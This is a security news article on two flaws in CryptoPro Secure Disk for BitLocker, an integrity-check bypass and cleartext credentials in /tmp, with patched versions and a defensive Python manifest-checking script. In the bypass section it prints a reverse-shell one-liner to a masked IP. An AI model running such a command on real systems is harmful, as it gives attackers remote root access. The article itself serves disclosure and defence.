Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft



Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution.

These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials.

The issues identified by security researchers at SEC Consult Vulnerability Lab highlight significant risks for organizations that rely on this software for data protection.

CVE | CVSS | Details
CVE-2025-10010 | N/A | Integrity bypass enables root code execution.
N/A | N/A | Cleartext /tmp data exposes credentials.

Integrity Validation Bypass

The first vulnerability, designated as CVE-2025-10010, involves an integrity validation bypass.

CryptoPro Secure Disk boots a minimal Linux operating system to authenticate users, then decrypts the Windows partition with BitLocker.

This Linux system resides on an unencrypted partition, accessible to anyone who can physically reach the hard drive or boot the system from an external medium.


While the system uses the Linux kernel’s Integrity Measurement Architecture (IMA) to verify files, researchers found that IMA does not validate certain configuration files.

bash -c 'exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' &

By manipulating these files, an attacker can execute arbitrary code with root privileges. This could allow them to plant a backdoor and monitor or access data during execution without triggering any system errors.
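Because the tampering described above happens in files IMA does not check, one defensive measure is an out-of-band comparison of the PBA partition against a known-good manifest. The following is an added example, not code from SEC Consult or CPSD; it assumes the partition is mounted read-only from a trusted system, and the helper names and command-line arguments are illustrative. It also reports whether each changed file carries a `security.ima` attribute, since a file without one cannot be appraised by IMA.

```python
# Added example: helper names and CLI arguments are illustrative assumptions.
import hashlib
import json
import os
import sys

IMA_XATTR = "security.ima"  # xattr holding the hash/signature IMA appraisal checks

def has_ima_xattr(path):
    """True if the file carries a security.ima xattr (Linux only)."""
    try:
        os.getxattr(path, IMA_XATTR)
        return True
    except (OSError, AttributeError):  # no xattr, unsupported fs, or non-Linux
        return False

def snapshot(root):
    """Map relative path -> {sha256, ima} for each regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                with open(full, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
                out[os.path.relpath(full, root)] = {"sha256": digest, "ima": has_ima_xattr(full)}
    return out

def compare(baseline, current):
    """Return (path, status, has_ima_xattr) for every added/removed/modified file."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old and new and old["sha256"] == new["sha256"]:
            continue
        status = "added" if old is None else "removed" if new is None else "modified"
        findings.append((path, status, (new or old)["ima"]))
    return findings

if __name__ == "__main__":  # usage: baseline|verify <mountpoint> <manifest.json>
    mode, root, manifest = sys.argv[1:4]
    if mode == "baseline":
        with open(manifest, "w") as fh:
            json.dump(snapshot(root), fh, indent=1)
    else:
        with open(manifest) as fh:
            results = compare(json.load(fh), snapshot(root))
        for path, status, ima in results:
            print(f"{status:9}{path}  security.ima={'yes' if ima else 'NO'}")
        sys.exit(1 if results else 0)
```

Store the manifest away from the device being checked; a manifest kept on the same unencrypted partition can be rewritten along with the files.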

Product | Vulnerable Versions | Fixed Versions
CPSD CryptoPro Secure Disk | < 7.6.6 / < 7.7.1 | 7.6.6 / 7.7.1

Cleartext Storage of Sensitive Data

The second issue concerns the storage of sensitive data in clear text. When users forget their credentials, CryptoPro Secure Disk offers an online support feature that connects to a predefined network.

According to SEC Consult, to facilitate this connection, the system stores necessary secrets, such as certificates and passwords, in cleartext within the temporary ‘/tmp’ folder.

If an attacker has already gained access to the Linux environment, perhaps through the first vulnerability, they can easily read these files.

Figure: Cleartext certificate credentials expose WLAN access and enable 802.1X bypass (source: SEC Consult)

This information could then be used to access internal networks or bypass network access controls, further compromising the organization’s infrastructure.

The vendor, CPSD, was notified of these issues in June 2025 and has since provided patches. Versions 7.6.6 and 7.7.1 address the vulnerabilities.

Organizations using CryptoPro Secure Disk should update their software immediately. If updating is not immediately possible, the vendor recommends encrypting the PBA partition, a feature available since version 7.6.0.

Starting with version 7.7, this encryption is enabled by default, mitigating the risk of unauthorized file modifications.

SEC Consult also advises organizations to conduct thorough security reviews of their encryption solutions to identify and address any other potential weaknesses.
